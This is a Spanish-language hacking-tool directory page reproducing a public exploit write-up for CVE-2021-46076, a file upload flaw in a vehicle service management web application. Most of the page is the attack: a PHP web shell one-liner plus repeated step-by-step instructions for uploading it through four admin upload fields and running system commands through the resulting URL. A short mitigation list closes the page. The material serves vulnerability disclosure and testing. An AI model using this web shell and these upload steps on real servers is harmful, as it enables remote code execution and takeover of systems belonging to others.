Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-46076 — CVE-2021-46076 - Sourcecodester Vehicle Service Management System 1.0 es vulnerable a la carga de archivos. Un atacante puede subir un archivo php malicioso en múltiples endpoints, lo que conduce a la Ejecución de Código. | Kitploit
Herramientas/GitHubGitHub/sanupl/cve-2021-46076
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubsanupl/cve-2021-46076

CVE-2021-46076

CVE-2021-46076 - Sourcecodester Vehicle Service Management System 1.0 es vulnerable a la carga de archivos. Un atacante puede subir un archivo php malicioso en múltiples endpoints, lo que conduce a la Ejecución de Código.

Ver Repositorio
11hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-46076

Título del Exploit: Vehicle Service Management System - La carga de archivos 'múltiple' conduce a la ejecución de código

Autor del Exploit: SANU P.L

CVE: CVE-2021-46076

CVSS: 8.8 ALTA

Referencias:

  • https://www.plsanu.com/vehicle-service-management-system-multiple-file-upload-leads-to-code-execution
  • https://nvd.nist.gov/vuln/detail/CVE-2021-46076
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46076

Descripción:

Sourcecodester Vehicle Service Management System 1.0 es vulnerable a la carga de archivos. Un atacante puede subir un archivo php malicioso en múltiples endpoints, lo que conduce a la ejecución de código.

1. Vehicle Service Management System - 'MyAccount' (/admin/?page=user)

Exploit:

  1. Inicie sesión en el panel de administración http://localhost/vehicle_service/admin
  2. Navegue hasta la sección My Account http://localhost/vehicle_service/admin/?page=user

Payload:

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. Guarde el código php anterior, por ejemplo: Cmd.php
  2. En la sección My Account, introduzca todos los datos requeridos y seleccione el archivo php en Avatar.
  3. Haga clic en el botón Actualizar.
  4. Abra la imagen del avatar en una pestaña nueva.
  5. Añada el parámetro cmd en la URL y ejecute los comandos.
  6. URL final: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. Ejecute todos los comandos del sistema, por ejemplo: id, whoami, pwd, etc.

2. Vehicle Service Management System - 'User List' (/admin/?page=user/manage_user)

Exploit:

  1. Inicie sesión en el panel de administración http://localhost/vehicle_service/admin
  2. Vaya a la sección User List y haga clic en el botón Create New.

Payload:

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. Guarde el código php anterior, por ejemplo: Cmd.php
  2. En la página Create New User, introduzca todos los datos requeridos y seleccione el archivo php en Avatar.
  3. Haga clic en el botón Guardar.
  4. Abra la imagen del avatar en una pestaña nueva.
  5. Añada el parámetro cmd en la URL y ejecute los comandos.
  6. URL final: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. Ejecute todos los comandos del sistema, por ejemplo: id, whoami, pwd, etc.

3. Vehicle Service Management System - 'Settings-System Logo' (/admin/?page=system_info)

Exploit:

  1. Inicie sesión en el panel de administración http://localhost/vehicle_service/admin
  2. Vaya a la sección Settings http://localhost/vehicle_service/admin/?page=system_info

Payload:

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. Guarde el código php anterior, por ejemplo: Cmd.php
  2. En la sección Settings, introduzca todos los datos requeridos y seleccione el archivo php en System Logo.
  3. Haga clic en el botón Actualizar.
  4. Abra la imagen del System Logo en una pestaña nueva.
  5. Añada el parámetro cmd en la URL y ejecute los comandos.
  6. URL final: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. Ejecute todos los comandos del sistema, por ejemplo: id, whoami, pwd, etc.

4. Vehicle Service Management System - 'Settings-Website Cover' (/admin/?page=system_info)

Exploit:

  1. Inicie sesión en el panel de administración http://localhost/vehicle_service/admin
  2. Vaya a la sección Settings http://localhost/vehicle_service/admin/?page=system_info

Payload:

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. Guarde el código php anterior, por ejemplo: Cmd.php
  2. En la sección Settings, introduzca todos los datos requeridos y seleccione el archivo php en Website Cover.
  3. Haga clic en el botón Actualizar.
  4. Abra la imagen del Website Cover en una pestaña nueva.
  5. Añada el parámetro cmd en la URL y ejecute los comandos.
  6. URL final: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. Ejecute todos los comandos del sistema, por ejemplo: id, whoami, pwd, etc.

Impacto:

Un atacante puede subir archivos php maliciosos en múltiples endpoints, lo que conduce a la ejecución de código.

Mitigación:

Se recomienda implementar lo siguiente:

  • Nunca acepte un nombre de archivo y su extensión directamente sin un filtro de lista blanca.
  • Si no es necesario tener caracteres Unicode, se recomienda encarecidamente aceptar únicamente caracteres alfanuméricos y un solo punto como entrada para el nombre de archivo y la extensión.
  • Limite el tamaño del archivo a un valor máximo para prevenir ataques de denegación de servicio.
  • El directorio de carga no debe tener ningún permiso de «ejecución».
  • No confíe únicamente en la validación del lado del cliente.
Descargar herramienta